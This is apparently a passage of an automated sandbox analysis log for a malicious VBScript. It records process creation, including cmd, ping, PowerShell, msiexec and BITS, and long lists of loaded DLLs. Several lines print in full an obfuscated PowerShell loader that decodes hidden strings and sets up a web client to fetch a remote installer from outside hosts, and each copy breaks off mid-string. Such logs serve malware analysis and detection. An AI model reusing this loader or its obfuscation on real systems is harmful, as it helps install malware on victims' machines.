      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
